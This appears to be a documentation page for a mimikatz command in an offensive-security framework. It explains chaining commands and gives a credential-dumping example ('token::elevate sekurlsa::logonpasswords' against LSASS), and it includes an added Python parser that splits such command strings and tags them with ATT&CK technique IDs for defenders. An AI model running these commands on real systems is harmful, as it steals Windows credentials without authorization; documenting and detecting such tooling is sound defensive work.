Artifacts Generated: Process Create, Process Inject, Process Kill
Summary
Execute one or more mimikatz commands.
Arguments (Positional)
Command
The command you would like mimikatz to run. Some commands require certain privileges and may need the token::elevate Mimikatz command or the builtin equivalent getprivs to be executed first.
The mimikatz binary takes space-separated commands. For example, if you wanted to ensure your token had the correct privileges before dumping LSASS, you could do mimikatz token::elevate sekurlsa::logonpasswords to first elevate your token before running logonpasswords. Due to this space-separated command list, if you wish to run a command that has arguments (or spaces in its command name), you’ll need to encapsulate that command in escaped quotes.
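For defenders reviewing logged tasking or command-line strings, the space-separated format described above can be split the same way to recover each command and tag it with a technique from the ATT&CK list on this page. The following Python is an added example, not code from the original page or from the project; the function names, the constructed sample string, the placeholder `module::command /arg:value`, and the `\"` form of the escaped quotes are assumptions.

```python
import re

# A mimikatz command name has the form module::command.
NAME_RE = re.compile(r"^[a-z0-9_]+::[a-z0-9_]+$")

# Only the two commands named on this page, with IDs from its ATT&CK list.
TECHNIQUE = {"token::elevate": "T1134", "sekurlsa::logonpasswords": "T1003"}

def split_commands(arg_string):
    """Split on spaces; a command in plain or backslash-escaped quotes stays whole."""
    commands, current, in_quote, i = [], [], False, 0
    while i < len(arg_string):
        ch = arg_string[i]
        if ch == "\\" and arg_string[i + 1:i + 2] == '"':
            in_quote, i = not in_quote, i + 2   # escaped quote toggles grouping
            continue
        if ch == '"':
            in_quote = not in_quote
        elif ch.isspace() and not in_quote:
            if current:                         # separator between commands
                commands.append("".join(current))
                current = []
        else:
            current.append(ch)
        i += 1
    if current:                                 # also covers an unclosed quote
        commands.append("".join(current))
    return commands

def triage(arg_string):
    """Return (command name, technique ID or 'unmapped') per command found."""
    findings = []
    for cmd in split_commands(arg_string):
        words = cmd.split()
        name = words[0].lower() if words else ""
        if NAME_RE.match(name):
            findings.append((name, TECHNIQUE.get(name, "unmapped")))
    return findings

# Constructed sample; the quoted entry is a placeholder, not a real command.
SAMPLE = r'token::elevate sekurlsa::logonpasswords \"module::command /arg:value\"'

if __name__ == "__main__":
    for name, technique in triage(SAMPLE):
        print(f"{name}\t{technique}")
```

Matching on the module::command shape rather than a fixed list means commands outside the small mapping are still surfaced as "unmapped" for review.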
Usage
See Also
MITRE ATT&CK Mapping
- T1134
- T1098
- T1547
- T1555
- T1003
- T1207
- T1558
- T1552
- T1550